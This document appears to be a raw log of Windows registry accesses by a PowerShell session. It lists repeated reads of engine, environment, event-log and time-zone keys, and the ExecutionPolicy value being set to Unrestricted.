__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\XML
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\XML
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_CURRENT_USER
ExecutionPolicy
ExecutionPolicy
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_CURRENT_USER
ExecutionPolicy
ExecutionPolicy
Unrestricted
REG_SZ
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
ExecutionPolicy
ExecutionPolicy
Unrestricted
REG_SZ
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_CURRENT_USER
ExecutionPolicy
ExecutionPolicy
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\DataCollection
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\DataCollection
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
